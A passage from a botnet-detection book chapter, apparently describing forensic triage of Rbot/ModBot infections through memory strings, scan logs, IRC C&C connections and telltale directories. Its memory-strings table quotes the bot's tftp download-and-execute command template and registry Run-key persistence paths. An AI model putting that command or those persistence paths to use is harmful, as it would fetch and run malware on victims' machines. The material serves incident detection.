427 Botnet fm qxd

botherder to locate where he had put the components of his malware.This
proved useful on all subsequent searches. As we have mentioned a few times,
the .ini files provided intelligence data about ports and IP addresses to watch.
In the process explorer results we noted an application running called iex-
plorer.exe. Using the strings tab in process explorer, we can look at the image
of the process on the hard drive or in memory. Rbot uses packaging to
encrypt/encode itself on the hard drive so that the image on the hard drive
doesn’t yield much. However, when the process executes, it must unpack
itself.The strings tab in memory is a goldmine.Table 5.8 shows some infor-
mation extracted from the strings in memory.
Table 5.8
Strings in Memory Sample 1
tftp -i %s get %s& start %s& exit
-[ModBot]-
Skonk-[ModBot]-Small-V0.4
iexplorer.exe
sysconfig.dat
Microsoft
Software\\Microsoft\\Windows\\CurrentVersion\\Run
Software\\Microsoft\\Windows\\CurrentVersion\\RunServices
Software\\Microsoft\\OLE
Software\\ASProtect
bong
#sym
#sym
#sym
12 120|MoD
12 ScAnAgE
12 RoOtAgE
snake@10.100.25.201
Ime A F*ck U Bot-And Ime Here To F*ck U Up
D CKFDENECFDEFFCFGEFFCCACACACACACA
EKEDFEEIEDCACACACACACACACACACAAA
If there was any doubt before, the line 3 from the bottom should be con-
vincing evidence for even the biggest skeptic.This is definitely a bot. Now
let’s look at a second example (see Table 5.9).
www.syngress.com
Botnet Detection: Tools and Techniques • Chapter 5
205
427_Botnet_05.qxd 1/9/07 9:59 AM Page 205

Table 5.9 
Strings in Memory Sample 2
Server started on Port: 0, File: C:\WINDOWS\system32\iexplorer.exe, Request:
iexplorer.exe.
IP: 192.168.5.125:139, Scan thread: 1, Sub-thread: 1.
IP: 192.168.169.101:139, Scan thread: 1, Sub-thread: 2
IP: 192.168.221.197:139, Scan thread: 1, Sub-thread: 3.
IP: 192.168.174.2:139, Scan thread: 1, Sub-thread: 4.
IP: 192.168.225.65:139, Scan thread: 1, Sub-thread: 5.
IP: 192.168.245.108:139, Scan thread: 1, Sub-thread: 6.
The bot has begun to scan the class B network for a system with port 139
open.The bot connected to an IRC channel #sym. 10.201.209.5 is likely the
C&C server (see Table 5.10).
Table 5.10
Memory Strings Sample: An IRC Connection
[12-25-2006 06:42:24] Joined channel: #sym
[12-25-2006 06:42:24] Joined channel: #sym
[12-25-2006 06:42:24] Joined channel: #sym
[12-25-2006 06:42:12] Connected to 10.201.209.5
After collecting and analyzing the data from these quick forensics, we
were able to identify a directory structure that was present on the majority of
the infected systems we examined.The base location of the directory struc-
ture changed, but it was always present somewhere, whether in the Recycle
folder, the Java\Trustlib folder, or elsewhere (see Figure 5.8). When doing the
quick forensic we also check for these folders that we have seen before.
If you are in an enterprise and you use a remote management tool like
LanDesk Manager or Altiris, you can create a job to run on all managed sys-
tems to look for other infected systems by identifying all computers that have
this unique directory.

Download 6,98 Mb.

Do'stlaringiz bilan baham: